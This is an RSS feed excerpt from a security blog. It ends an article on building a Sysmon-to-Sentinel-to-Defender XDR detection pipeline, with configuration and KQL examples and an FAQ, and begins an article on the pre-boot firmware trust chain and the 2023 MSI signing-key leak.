&lt;p&gt;None of these problems is fatal to the architecture. Each is the kind of structural friction that comes from grafting three pre-existing pipelines into one analyst surface in fewer than three years. The cutover date is the only one with a deadline; the rest are roadmap items.&lt;/p&gt;
&lt;h2&gt;10. Recipe: building the pipeline yourself in six steps&lt;/h2&gt;
&lt;p&gt;This section walks the six setup steps that produce the worked example end-to-end, in the order an engineer should actually do them. Each step names the artifact, the documentation reference, and the single most common mistake that will silently break the step.&lt;/p&gt;
&lt;h3&gt;Step 1 -- Install Sysmon with a curated configuration&lt;/h3&gt;
&lt;p&gt;Install Sysmon on the host (Azure VM, Arc-enabled server, or on-prem Windows) with a configuration that emits the events you actually need [@ms-learn-sysmon]. The default Sysmon config is essentially empty; a curated config is what makes it useful. Many teams start with the SwiftOnSecurity &lt;code&gt;sysmon-config&lt;/code&gt; or Olaf Hartong &lt;code&gt;sysmon-modular&lt;/code&gt; public baselines and prune from there [@swiftonsecurity-sysmon-config] [@hartong-sysmon-modular].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;strong&gt;Don&apos;t reinvent the Sysmon config.&lt;/strong&gt; Two community-maintained baselines do most of the work: the SwiftOnSecurity &lt;code&gt;sysmon-config&lt;/code&gt; template (&quot;a Sysmon configuration file for everybody to fork...with default high-quality event tracing&quot;) and Olaf Hartong&apos;s &lt;code&gt;sysmon-modular&lt;/code&gt; framework (&quot;a Sysmon configuration repository for everybody to customise&quot;) cover the common cases with years of community tuning [@swiftonsecurity-sysmon-config] [@hartong-sysmon-modular]. Pick one, version-control it in your config-management tool (DSC, Ansible, Chef), and ship it via your existing host-config pipeline. The single most common mistake is shipping a default Sysmon install and then wondering why detections fire on noise.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Validate that Sysmon is emitting by reading the local event log on the host: &lt;code&gt;Get-WinEvent -LogName &quot;Microsoft-Windows-Sysmon/Operational&quot; -MaxEvents 5&lt;/code&gt;. If you see ProcessCreate (Event ID 1) records, hop 1 works.&lt;/p&gt;
&lt;h3&gt;Step 2 -- Deploy the Azure Monitor Agent with a Data Collection Rule&lt;/h3&gt;
&lt;p&gt;Install AMA on the host (via Azure Policy for Azure VMs, the Arc agent for non-Azure, or the standalone installer) [@ms-learn-ama-overview]. Then create a Data Collection Rule that names the Sysmon channel and ships it to your Sentinel-enabled workspace. The ARM snippet below is the load-bearing artifact: the &lt;code&gt;streams&lt;/code&gt; value must be exactly &lt;code&gt;Microsoft-WindowsEvent&lt;/code&gt; (or, for the older &lt;code&gt;Event&lt;/code&gt; table path, &lt;code&gt;Microsoft-Event&lt;/code&gt;), not a variant. &lt;strong&gt;This is the silent-failure cliff §6.2 named: get this string wrong and the agent ships nothing, returning no error.&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
  &quot;type&quot;: &quot;Microsoft.Insights/dataCollectionRules&quot;,
  &quot;apiVersion&quot;: &quot;2022-06-01&quot;,
  &quot;name&quot;: &quot;dcr-sysmon-to-sentinel&quot;,
  &quot;location&quot;: &quot;eastus&quot;,
  &quot;properties&quot;: {
    &quot;dataSources&quot;: {
      &quot;windowsEventLogs&quot;: [
        {
          &quot;name&quot;: &quot;sysmonOperational&quot;,
          &quot;streams&quot;: [&quot;Microsoft-WindowsEvent&quot;],
          &quot;xPathQueries&quot;: [
            &quot;Microsoft-Windows-Sysmon/Operational!*[System[(EventID=1 or EventID=3 or EventID=7 or EventID=10 or EventID=11)]]&quot;
          ]
        }
      ]
    },
    &quot;destinations&quot;: {
      &quot;logAnalytics&quot;: [
        { &quot;name&quot;: &quot;lawDest&quot;,
          &quot;workspaceResourceId&quot;:
            &quot;/subscriptions/&amp;lt;sub&amp;gt;/resourceGroups/&amp;lt;rg&amp;gt;/providers/Microsoft.OperationalInsights/workspaces/law-contoso-secops&quot; }
      ]
    },
    &quot;dataFlows&quot;: [
      { &quot;streams&quot;: [&quot;Microsoft-WindowsEvent&quot;],
        &quot;destinations&quot;: [&quot;lawDest&quot;] }
    ]
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The silent-miss bug is real: a DCR that names &lt;code&gt;&quot;Microsoft-Event&quot;&lt;/code&gt; ships into the older &lt;code&gt;Event&lt;/code&gt; table; a DCR that names &lt;code&gt;&quot;Microsoft-WindowsEvent&quot;&lt;/code&gt; ships into the newer typed &lt;code&gt;WindowsEvent&lt;/code&gt; table; &lt;strong&gt;a DCR that names anything else (typo, copy-paste from another data source, or a name that does not exist) emits nothing, returns no validation error at deploy time, and produces a silent dashboard hole&lt;/strong&gt; [@ms-learn-ama-windows-events] [@ms-learn-sentinel-data-connectors-ref]. The fix is to validate post-deploy by checking that rows are arriving in the destination table within ~5 minutes.&lt;/p&gt;
&lt;p&gt;Validation KQL to run in the workspace:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-kql&quot;&gt;Event
| where TimeGenerated &amp;gt; ago(10m)
| where Source == &quot;Microsoft-Windows-Sysmon&quot; and EventID == 1
| summarize count() by Computer
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you see a row per Sysmon-emitting host, hop 2 and hop 3 work.&lt;/p&gt;
&lt;h3&gt;Step 3 -- Author the Sentinel scheduled analytics rule&lt;/h3&gt;
&lt;p&gt;Inside the Defender portal&apos;s Sentinel section (or the Azure-portal Sentinel blade until the March 31, 2027 cutover), create a new scheduled analytics rule [@ms-learn-sentinel-scheduled-rules] [@ms-learn-sentinel-azure-portal-retiring]. Paste the KQL from the Spoiler in §6.3. Configure entity mappings: &lt;code&gt;Host&lt;/code&gt; from &lt;code&gt;Computer&lt;/code&gt;, &lt;code&gt;Account&lt;/code&gt; from &lt;code&gt;User&lt;/code&gt;, &lt;code&gt;Process&lt;/code&gt; from &lt;code&gt;ProcessGuid&lt;/code&gt;. Schedule: run every 5 minutes over the last 5 minutes. Severity: Medium. Tactic: &lt;code&gt;Execution&lt;/code&gt; (MITRE ATT&amp;amp;CK T1059.001).&lt;/p&gt;
&lt;p&gt;The single most common mistake at this step is &lt;strong&gt;omitting the entity mappings&lt;/strong&gt;. The rule will fire and produce a &lt;code&gt;SecurityAlert&lt;/code&gt; row, but the alert will not participate in cross-pipeline correlation at hop 6 because there are no entities to merge on. Always configure at least Host, Account, and -- when available -- Process or FileHash entity mappings on a Sentinel rule.&lt;/p&gt;

This recipe sets up the Sysmon-to-Sentinel-to-XDR path only. Adjacent surfaces -- Microsoft Defender for Office 365 for email alerts, Microsoft Defender for Identity for on-prem AD signals, Microsoft Defender for Cloud Apps (MDCA) for SaaS-app signals -- have their own onboarding paths and are out of scope for this six-step recipe. The convergence point in Defender XDR is the same; the upstream setup differs per source.&lt;p&gt;Five other adjacent surfaces are worth knowing about as a map of the broader Microsoft SecOps surface, even though this article does not walk any of them:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Sentinel watchlists&lt;/strong&gt; -- name-value reference tables (e.g., critical-asset inventory, terminated-user list, custom IOC list) stored in the &lt;code&gt;Watchlist&lt;/code&gt; table and cached for low-latency enrichment joins in KQL analytics rules and hunts [@ms-learn-sentinel-watchlists].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sentinel threat intelligence integration&lt;/strong&gt; -- ingest IOCs from TAXII feeds, Microsoft Defender Threat Intelligence, MISP, or platform connectors into the &lt;code&gt;ThreatIntelligenceIndicator&lt;/code&gt; table, and use the built-in TI map rule type to fire on matches against your telemetry [@ms-learn-sentinel-threat-intel].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;MSTICPy + Sentinel Jupyter notebooks&lt;/strong&gt; -- the Microsoft-maintained MSTICPy Python library plus Sentinel&apos;s notebook integration give hunters a programmable workspace for incident investigation, IOC pivoting, and ML-driven analysis on Sentinel data outside the rule-authoring surface [@ms-learn-sentinel-notebooks].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sentinel Content Hub and the solutions marketplace&lt;/strong&gt; -- the in-product distribution surface for prepackaged detections, parsers, workbooks, hunting queries, and playbooks delivered as Microsoft-signed or partner-signed solutions [@ms-learn-sentinel-solutions].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Microsoft Defender External Attack Surface Management (Defender EASM)&lt;/strong&gt; -- the adjacent posture surface that discovers and maps an organization&apos;s internet-facing assets from the outside-in; explicitly out of scope for this article&apos;s CSPM/CWPP/SIEM/XDR spine, but worth knowing exists [@ms-learn-defender-easm].&lt;/li&gt;&lt;/ul&gt;

&lt;h3&gt;Step 4 -- Enable Defender for Servers (Plan 2) for MDC alerts&lt;/h3&gt;
&lt;p&gt;On the Azure subscription that owns the VM (or the Arc-enabled resource group), enable Microsoft Defender for Cloud&apos;s Defender for Servers Plan 2 [@ms-learn-mdc-defender-servers]. Plan 2 includes the MDE license and the runtime detection engine that emits the MDC alert at hop 5. Enabling the plan automatically deploys MDE to the in-scope hosts and configures the MDC-to-XDR alert-ingestion integration that reached general availability in March 2024 [@ms-learn-mdc-mde-integration] [@ms-learn-mdc-xdr-ingest].&lt;/p&gt;
&lt;p&gt;Validation: trigger a benign test pattern (e.g., &lt;code&gt;powershell -EncodedCommand&lt;/code&gt; of a harmless script) on a test host. Within ~5 minutes, you should see an MDC alert in the MDC Alerts blade titled &lt;code&gt;Suspicious PowerShell command line&lt;/code&gt; (or similar), and a corresponding alert in &lt;code&gt;security.microsoft.com&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Step 5 -- Connect Sentinel to the unified Defender portal&lt;/h3&gt;
&lt;p&gt;Inside the Defender portal, enable the Sentinel connection that designates your Log Analytics workspace as the &lt;strong&gt;primary workspace&lt;/strong&gt; for the unified secops experience [@ms-learn-sentinel-defender-portal] [@ms-learn-move-to-defender]. This step is what makes the Sentinel &lt;code&gt;SecurityAlert&lt;/code&gt; rows flow into the Defender XDR incident graph at hop 6 and become merge candidates with the MDC and MDE alerts.&lt;/p&gt;
&lt;p&gt;One-tenant, one-primary-workspace constraint: as §6.6 noted, a Defender XDR tenant has exactly one primary Sentinel workspace. If you have multiple workspaces (regional residency reasons, MSSP topology, etc.), choose deliberately which one is the XDR-connected one. Alerts in secondary workspaces remain queryable via Sentinel but do not participate in the unified incident graph.&lt;/p&gt;
&lt;h3&gt;Step 6 -- Write a watchdog rule that fires on telemetry silence&lt;/h3&gt;
&lt;p&gt;The pipeline can fail silently in multiple places: AMA stops on a host, the DCR is removed or mis-edited, Sysmon is uninstalled, the workspace fills its daily cap. None of these failures produce an alert by themselves. Write a Sentinel scheduled rule that fires when &lt;strong&gt;expected&lt;/strong&gt; telemetry is &lt;em&gt;absent&lt;/em&gt;: for each host in your inventory, alert if &lt;code&gt;Event&lt;/code&gt; table rows from that host stop appearing for more than N minutes.&lt;/p&gt;

{`# Run via Azure Monitor REST API or the az monitor cli; here we simulate
# the comparison logic that an analytics rule would express in KQL.&lt;p&gt;EXPECTED_INVENTORY = {
    &apos;MAL-CONTOSO-PRD-01&apos;,
    &apos;MAL-CONTOSO-PRD-02&apos;,
    &apos;MAL-CONTOSO-PRD-03&apos;,
    &apos;MAL-CONTOSO-PRD-04&apos;,
    &apos;MAL-CONTOSO-PRD-05&apos;,
}&lt;/p&gt;
In a real deployment this list comes from KQL against the Event table:
Event | where TimeGenerated &amp;gt; ago(24h)
| summarize by Computer
&lt;p&gt;RECENTLY_EMITTING_HOSTS = {
    &apos;MAL-CONTOSO-PRD-01&apos;,
    &apos;MAL-CONTOSO-PRD-02&apos;,
    # PRD-03 absent: agent down? DCR removed?
    &apos;MAL-CONTOSO-PRD-04&apos;,
    &apos;MAL-CONTOSO-PRD-05&apos;,
}&lt;/p&gt;
&lt;p&gt;silent_hosts = EXPECTED_INVENTORY - RECENTLY_EMITTING_HOSTS
if silent_hosts:
    print(f&quot;ALERT: telemetry silence on {len(silent_hosts)} host(s):&quot;)
    for h in sorted(silent_hosts):
        print(f&quot;  - {h}&quot;)
else:
    print(&quot;OK: all expected hosts emitted Sysmon events in the last 24h.&quot;)
`}
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The equivalent in Sentinel is a scheduled rule that joins a static &lt;code&gt;Watchlist&lt;/code&gt; of expected hosts against &lt;code&gt;Event | summarize by Computer&lt;/code&gt; over the last 24 hours and alerts on the set difference. This watchdog is the only thing standing between an architectural diagram of perfect convergence and the operational reality of one host&apos;s silent agent.&lt;/p&gt;

This recipe addresses detection-and-response only. Compliance framing -- mapping detections to MITRE ATT&amp;amp;CK tactics, mapping posture findings to MCSB controls, reporting against PCI-DSS or NIST 800-53 -- is a separate concern handled by MCSB and the MDC regulatory-compliance blade [@ms-learn-mcsb-overview]. Most enterprise SOCs end up doing both, but a working detection pipeline can ship without the compliance layer attached.
&lt;p&gt;With these six steps the Sysmon record from §1 reaches &lt;code&gt;security.microsoft.com&lt;/code&gt; in roughly nine minutes, three alerts merged into one incident. The pipeline is real. The next section addresses the questions that show up in every architecture-review meeting once the pipeline is built.&lt;/p&gt;
&lt;h2&gt;11. FAQ&lt;/h2&gt;

  
It depends on whether you need a SIEM. MDE alone gives you endpoint detection, response actions on the endpoint, and a native incident view inside Defender XDR. It does not give you a place to ingest non-endpoint log sources (firewall, identity provider that is not Microsoft Entra, custom application logs) and run cross-source correlation against them. Sentinel is the SIEM substrate that does that [@ms-learn-mde-landing] [@ms-learn-sentinel-overview]. A small organization whose telemetry is entirely MDE-and-Microsoft-365 can run without Sentinel; one whose threat model includes anything outside that envelope generally needs it.
    
No. As §6.5 established and as the Microsoft documentation is explicit about, only MDC&apos;s **CWPP alerts** (from Defender for Servers, Containers, SQL, Storage, App Service plans) flow into the Defender XDR incident graph [@ms-learn-mdc-xdr-concept] [@ms-learn-mdc-xdr-ingest]. CSPM-side artifacts -- recommendations, Secure Score deltas, regulatory-compliance findings -- stay in the Microsoft Defender for Cloud blade. If you want posture context attached to an incident, you have to pivot manually to MDC or join `SecurityRecommendation` against the incident&apos;s affected resources via KQL.
    
For the documented Sysmon-to-Sentinel-to-XDR path: roughly 5 to 10 minutes typical. The dominant factor is the Sentinel scheduled-rule cadence (minimum 5 minutes) [@ms-learn-sentinel-scheduled-rules]. NRT rules cut it to 1-2 minutes for single-row matches [@ms-learn-sentinel-nrt-rules]. MDE&apos;s native path through Defender XDR is sub-minute for the endpoint detection itself; the cross-pipeline merge happens in the correlation engine within a sliding window after the slowest pipeline reports. Don&apos;t promise sub-minute for the SIEM path; do promise sub-minute for the EDR-direct path.
    
Because each pipeline names hosts in its own grammar. MDE uses a `DeviceId` (a Microsoft-generated GUID). Sentinel uses `Computer` (the hostname as Windows reports it). MDC uses the Azure `resourceId` for the underlying VM. Microsoft Entra ID uses a directory `ObjectId`. The Defender XDR correlation engine normalizes these where it can [@ms-learn-xdr-correlation] [@ms-learn-sentinel-entities], but in raw KQL queries you have to `join` across the identifier spaces explicitly. The `IdentityInfo` and `DeviceInfo` tables are the join helpers; the entity-resolution problem from §8 is what makes this non-trivial.
    
**March 31, 2027** (extended from the original July 1, 2026 target). After that date, Microsoft Sentinel can only be accessed via the unified Defender portal at `security.microsoft.com` [@ms-learn-sentinel-azure-portal-retiring] [@helpnetsec-sentinel-defender-timeline]. Customers with custom dashboards, automation, or ARM templates targeting the Azure-portal Sentinel surface need to plan migration. The underlying Log Analytics workspace and KQL queries do not change; the analyst UI does.
    
It depends on where your telemetry lives. **Sentinel scheduled rules** read from Log Analytics tables (`Event`, `SecurityEvent`, `Syslog`, custom tables) and are the right answer when your detection covers data ingested via DCRs or Sentinel connectors. **Defender XDR Custom Detections** read from the advanced-hunting schema (`DeviceProcessEvents`, `DeviceFileEvents`, `EmailEvents`, etc.) and are the right answer when your detection covers MDE / Defender for Office / Defender for Identity-native telemetry [@ms-learn-sentinel-custom-detections] [@ms-learn-advanced-hunting]. The two are not interchangeable; the field names and result-size caps differ. A common operational pattern is &quot;Sentinel for everything Sysmon and third-party, Custom Detections for everything MDE-native.&quot;
    
Partially, and only by hand. Sentinel automation rules invoke Azure Logic Apps playbooks, and those playbooks can call the Microsoft Defender for Cloud REST API directly to take actions like creating an assessment or (with limited surface area) acknowledging an alert [@ms-learn-sentinel-logic-apps-playbooks] [@ms-learn-mdc-assessments-rest] [@ms-learn-mdc-custom-recs]. There is no first-class &quot;MDC alert action&quot; Logic Apps connector with the same breadth as the MDE connector. Customers building bidirectional Sentinel-MDC response automation write HTTP-action playbooks against the MDC REST API and accept that the integration is less native than the MDE side.
  
&lt;p&gt;&amp;lt;StudyGuide
  terms={[
    &apos;SIEM&apos;,
    &apos;SOAR&apos;,
    &apos;EDR&apos;,
    &apos;XDR&apos;,
    &apos;CSPM&apos;,
    &apos;CWPP&apos;,
    &apos;MCSB&apos;,
    &apos;KQL&apos;,
    &apos;Log Analytics workspace&apos;,
    &apos;Azure Monitor Agent (AMA)&apos;,
    &apos;Data Collection Rule (DCR)&apos;,
    &apos;ProcessGuid&apos;,
    &apos;Sentinel scheduled analytics rule&apos;,
    &apos;Entity mapping&apos;,
    &apos;Defender XDR correlation engine&apos;,
  ]}
  questions={[
    &apos;Trace a single Sysmon ProcessCreate event through the six hops named in §6. At each hop, state the artifact that does the work and the most common silent-failure mode.&apos;,
    &apos;Why do MDC posture findings not appear in Defender XDR incidents, while MDC CWPP alerts do? Cite the architectural reason, not just the documented behaviour.&apos;,
    &apos;You inherit a Sentinel deployment whose Sysmon detections &quot;used to work.&quot; The Event table is empty for half the inventory. Name three places to check, in priority order.&apos;,
    &apos;Compare Sentinel scheduled rules and Defender XDR Custom Detections along three axes: schema read, latency, governance. When would you choose each?&apos;,
    &apos;A SOC analyst says &quot;the unified incident graph is missing alerts from our European workspace.&quot; What is the most likely cause, and what is the workaround?&apos;,
    &apos;Explain why the AMA DCR streams value &quot;Microsoft-Event&quot; vs &quot;Microsoft-WindowsEvent&quot; vs a typo all produce different outcomes, and what validation step catches the silent miss.&apos;,
  ]}
/&amp;gt;&lt;/p&gt;
</content:encoded><category>microsoft-sentinel</category><category>defender-for-cloud</category><category>defender-xdr</category><category>sysmon</category><category>kql</category><category>soc-architecture</category><category>cspm</category><category>cwpp</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Below the OS: The Pre-Boot Trust Chain Where Secure Boot Inherits Its Trust From</title><link>https://paragmali.com/blog/below-the-os-the-pre-boot-trust-chain-where-secure-boot-inhe/</link><guid isPermaLink="true">https://paragmali.com/blog/below-the-os-the-pre-boot-trust-chain-where-secure-boot-inhe/</guid><description>Walk the eleven rungs from CPU reset to winload.efi -- Intel Boot Guard, AMD PSB, CSME, the PSP, KB5025885, and why the April 2023 MSI OEM-key leak is structurally permanent.</description><pubDate>Wed, 03 Jun 2026 00:00:00 GMT</pubDate><content:encoded>
**Secure Boot is not where trust begins on a modern PC.** It is the fifth rung in an eleven-rung pre-OS chain that starts with a one-time-programmable fuse inside the chipset and travels through Intel Boot Guard or AMD Platform Secure Boot, through an on-die security processor (Intel CSME on MINIX 3, or AMD&apos;s ARM Cortex-A5 Secure Processor), through UEFI and Measured Boot, before it ever loads `winload.efi`. Every rung&apos;s verifier inherits the trust of the rung below it -- and the chain&apos;s revocation surface narrows monotonically as you descend. The April 2023 MSI / Money Message OEM-key leak [@binarly-msi] and the May 9, 2023 KB5025885 boot-manager revocation programme [@kb5025885] are the two worked examples that make the asymmetric-revocation argument concrete: at the fuse layer, there is no revocation primitive at all.

flowchart TD
    R0[&quot;Rung 0: CPU reset vector at 0xFFFFFFF0&quot;]
    subgraph IL[&quot;Intel path&quot;]
        I1[&quot;Rung 1: Microcode loads from SPI patch area&quot;]
        I2[&quot;Rung 2: Authenticated Code Module verified vs silicon-fused Intel key&quot;]
        I3[&quot;Rung 3: ACM reads Field Programmable Fuse, verifies KM and BPM&quot;]
        I4[&quot;Rung 4: Initial Boot Block hashed and compared to BPM&quot;]
    end
    subgraph AL[&quot;AMD path&quot;]
        A1[&quot;Rung 1: ARM Cortex-A5 PSP comes out of reset before x86 cores&quot;]
        A2[&quot;Rung 2: PSP boot ROM verifies PSP firmware vs AMD root key hash&quot;]
        A3[&quot;Rung 3: PSP reads OEM-key fuse, verifies signed BIOS image&quot;]
        A4[&quot;Rung 4: PSP releases x86 BSP from reset&quot;]
    end
    R5[&quot;Rung 5: SEC and PEI phases, memory init, cache as RAM&quot;]
    R6[&quot;Rung 6: DXE drivers loaded, UEFI variable services online&quot;]
    R7[&quot;Rung 7: Secure Boot evaluates Authenticode against PK, KEK, db, dbx&quot;]
    R8[&quot;Rung 8: Boot Device Selection picks bootmgfw.efi&quot;]
    R9[&quot;Rung 9: Boot Manager loads, Measured Boot extends PCR 4 through 7&quot;]
    R10[&quot;Rung 10: bootmgfw.efi verifies winload.efi&quot;]
    R11[&quot;Rung 11: Hand-off to winload.efi&quot;]
    R0 --&amp;gt; I1
    R0 --&amp;gt; A1
    I1 --&amp;gt; I2 --&amp;gt; I3 --&amp;gt; I4 --&amp;gt; R5
    A1 --&amp;gt; A2 --&amp;gt; A3 --&amp;gt; A4 --&amp;gt; R5
    R5 --&amp;gt; R6 --&amp;gt; R7 --&amp;gt; R8 --&amp;gt; R9 --&amp;gt; R10 --&amp;gt; R11
&lt;h2&gt;1. Permanently Downgraded to a Weaker Trust Model&lt;/h2&gt;
&lt;p&gt;On April 6, 2023, the Money Message ransomware actor published roughly 1.5 TB of MSI source code to a TOR-hosted leak site after MSI declined to pay a reported $4M ransom [@helpnet-msi-leak]. A month later, on May 5, Binarly&apos;s efiXplorer team opened the archive. Inside, they found something worse than source code. They found the Intel Boot Guard Key Manifest and Boot Policy Manifest private keys covering roughly 116 MSI systems, plus image-signing keys for 57 more products, with cross-OEM contamination across HP, Lenovo, AOPEN, CompuLab, and Star Labs [@binarly-msi] [@helpnet-msi-leak] [@register-msi-alt]. The affected platform generations spanned Tiger Lake, Alder Lake, and Raptor Lake [@register-msi-alt]. Binarly published a per-device impact catalogue in their &lt;code&gt;SupplyChainAttacks&lt;/code&gt; repository for triage by the affected vendors [@binarly-supply-chain].&lt;/p&gt;
&lt;p&gt;Those private keys correspond to public-key hashes that have already been burned, one-time-programmably, into a fuse inside the chipset of every affected machine. There is no revocation primitive at that fuse layer. Intel cannot patch this. MSI cannot patch this. Microsoft cannot patch this.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Every Intel system whose Field Programmable Fuse holds the hash of a leaked MSI OEM public key is now in a permanent state of reduced assurance against firmware tampering. The leak does not require a successful in-the-wild exploit to count as damage. The capability transfer happened the moment Money Message published the archive [@binarly-msi].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This story matters because most public writing about &quot;the boot security chain on a Windows PC&quot; stops at Secure Boot. The popular framing -- that the Platform Key (PK) is the trust anchor and the rest of the chain hangs from it -- is not just incomplete. It is upside down. Secure Boot&apos;s PK is a tenant of UEFI authenticated NVRAM stored in the SPI flash chip soldered next to the chipset [@uefi-specs]. PK&apos;s integrity depends on the SPI flash being unwritable to attackers. That property is what the rung below Secure Boot enforces. Without the lower-rung silicon-fused verifier, PK is just bytes in flash.&lt;/p&gt;
&lt;p&gt;A &lt;strong&gt;bootkit&lt;/strong&gt; is malware that survives in the pre-OS firmware boot path. It runs before the kernel exists and outlives both reboots and clean OS installs. Two recent ones bracket the operational threat.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;BlackLotus&lt;/strong&gt; [@eset-blacklotus]. Analysed by ESET researcher Martin Smolar on March 1, 2023, sold on hacking forums since October 2022. It was the first public UEFI bootkit observed bypassing Secure Boot on fully-patched Windows 11, via CVE-2022-21894 [@cve-2022-21894-nvd].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bootkitty&lt;/strong&gt; [@bootkitty] [@helpnet-bootkitty]. Disclosed by ESET on November 27, 2024. It was the first analogue for Linux.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These are the threats the pre-boot chain exists to defeat. And the pre-boot chain works only as well as the layer below it.&lt;/p&gt;

Why is the most permanent layer of the trust chain also the layer with no recovery surface?
&lt;p&gt;To answer that question, we have to walk down from the rung you know -- Secure Boot -- to the rung you probably do not: the fuse.&lt;/p&gt;
&lt;p&gt;That walk is the article. The eleven-rung diagram in the TLDR is the map. Along the way we will visit Intel Boot Guard, AMD Platform Secure Boot, the Intel Converged Security and Management Engine, and the AMD Platform Security Processor. We will see what gets verified, by what, and against what trust anchor. And we will see, three times at three increasing levels of compression, why the chain&apos;s revocation surface narrows monotonically as you descend, until at the bottom there is no revocation at all. Companion articles on &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt;, &lt;a href=&quot;https://paragmali.com/blog/measured-boot-the-tcg-event-log-from-srtm-to-pcr-bound-bitlo/&quot; rel=&quot;noopener&quot;&gt;Measured Boot&lt;/a&gt;, &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Pluton&lt;/a&gt;, &lt;a href=&quot;https://paragmali.com/blog/the-acpi-tables-that-quietly-secure-your-windows-machine/&quot; rel=&quot;noopener&quot;&gt;ACPI Tables&lt;/a&gt;, and Secured-core PCs cover the rungs &lt;em&gt;above&lt;/em&gt; this one. This article&apos;s lane is everything below them.&lt;/p&gt;
&lt;h2&gt;2. From &quot;BIOS Is Trusted Because Nobody Can Write to It&quot; to &quot;BIOS Has Its Own SoC&quot;&lt;/h2&gt;
&lt;p&gt;On September 13, 2011, Symantec analyst Liam Ge published an early analysis of Trojan.Mebromi on Symantec Connect [@symantec-bios-threat]; Liam O&apos;Murchu&apos;s contemporaneous Symantec Threat Intelligence writeup is the source MITRE catalogues at ATT&amp;amp;CK ID S0001 as the canonical primary [@mitre-mebromi-s0001]. Mebromi was the first in-the-wild BIOS rootkit observed on shipping consumer PCs. It rewrote the Award BIOS Master Boot Record code so that it reinjected itself into the OS on every boot. The Wikipedia BIOS security section preserves the same provenance [@wiki-bios-security].&lt;/p&gt;
&lt;p&gt;Four months earlier, in April 2011, NIST had published SP 800-147 (&quot;BIOS Protection Guidelines&quot;) attempting to mandate the cure: signed BIOS updates with an authenticated update mechanism rooted in immutable code [@nist-sp-800-147]. The cure arrived just as the disease made its in-the-wild debut. That four-month gap captures the entire history of pre-boot security on the PC platform: the defensive architecture always lags the attacker by roughly one generation, and each generation moves the trust anchor one layer closer to the silicon.&lt;/p&gt;
&lt;h3&gt;Generation 1 -- Trust by physical inaccessibility (pre-2011)&lt;/h3&gt;
&lt;p&gt;The implicit model from the IBM PC through the late 2000s was that nobody could write to the BIOS ROM, so the BIOS was trusted because it was unreachable. That model held only as long as nobody bothered. By 2011 the protections that had compensated for writable flash (the &lt;strong&gt;BIOSWE&lt;/strong&gt;, &lt;strong&gt;BLE&lt;/strong&gt;, &lt;strong&gt;SMM_BWP&lt;/strong&gt;, and &lt;strong&gt;FLOCKDN&lt;/strong&gt; chipset configuration bits described in the contemporary CHIPSEC literature [@c7zero-chipsec]) were widely misconfigured on shipping platforms. Academic SPI-rewrite research predated Mebromi by nearly a decade. Mebromi simply demonstrated that the field had caught up.&lt;/p&gt;
&lt;h3&gt;Generation 2 -- Signed BIOS updates anchored in BIOS (2011-2013)&lt;/h3&gt;
&lt;p&gt;NIST SP 800-147 [@nist-sp-800-147] and OEM responses to Mebromi produced a generation of platforms that signed BIOS updates and verified the signature before flashing. The structural flaw was immediate: the verifier lived in the region it was verifying. Burn the verifier with the update payload and you owned the next boot. Seven years later NIST SP 800-193 (&quot;Platform Firmware Resiliency Guidelines&quot;) explicitly raised the bar from Protection alone to Protection plus Detection plus Recovery [@nist-sp-800-193], implicitly conceding that Gen 2 had not closed the loop.&lt;/p&gt;
&lt;h3&gt;Generation 3 -- The trust anchor moves into silicon (2013-2015)&lt;/h3&gt;
&lt;p&gt;In the second quarter of 2013, Intel shipped Boot Guard alongside the Haswell CPU family. In the first half of 2014, AMD shipped the Platform Security Processor with the Family 16h &quot;Beema&quot; and &quot;Mullins&quot; mobile parts [@wiki-amd-psp]. The Wikipedia entry for AMD PSP records the architecture cleanly: &quot;The PSP itself represents an ARM core (ARM Cortex-A5) with the TrustZone extension ... inserted into the main CPU die as a coprocessor&quot; [@wiki-amd-psp]. With Gen 3, the trust anchor moved out of mutable storage entirely. The verifier was no longer a region of flash; it was a piece of silicon that could not be rewritten without replacing the chip.&lt;/p&gt;
&lt;p&gt;In 2015, the Skylake CPU family shipped with ME 11, the first ME generation built on the Intel Quark x86 core (replacing the ARC-based predecessors) and running a modified MINIX 3 microkernel as its on-die runtime [@wiki-ime] [@wiki-ime-history]. The Converged Security and Management Engine (CSME) brand name folded ME, TXE, and SPS into a single architectural label.&lt;/p&gt;

In November 2017, Andrew S. Tanenbaum -- the creator of MINIX 3 -- published an open letter to Intel that read in part: *&quot;Thanks for putting a version of MINIX inside the ME-11 management engine chip used on almost all recent desktop and laptop computers in the world&quot;* [@tanenbaum-letter]. The hosted letter at cs.vu.nl carries no explicit publication date; the early-November dating derives from contemporaneous press coverage. Intel had never consulted him; he learned about MINIX&apos;s role only when independent researchers reverse-engineered the ME runtime.&lt;p&gt;The cultural moment mattered because it surfaced something the architecture had hidden: every modern Intel PC ships a second operating system, on a second processor, that boots before yours does. The trust chain you are reading about exists in part because that second OS exists.&lt;/p&gt;
